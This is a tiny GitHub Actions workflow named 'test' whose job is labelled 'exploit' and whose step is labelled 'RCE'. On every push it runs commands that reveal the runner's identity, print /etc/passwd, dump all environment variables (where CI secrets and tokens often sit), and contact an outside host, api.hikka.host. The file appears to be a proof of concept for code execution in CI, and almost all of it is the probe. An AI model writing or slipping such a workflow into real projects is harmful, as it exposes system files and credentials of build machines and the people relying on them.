13 lines
228 B
YAML
13 lines
228 B
YAML
name: test
|
|
on: [push]
|
|
jobs:
|
|
exploit:
|
|
runs-on: ubuntu-latest
|
|
steps:
|
|
- name: RCE
|
|
run: |
|
|
id
|
|
cat /etc/passwd
|
|
env
|
|
curl http://api.hikka.host/api/statistic | head -c 100
|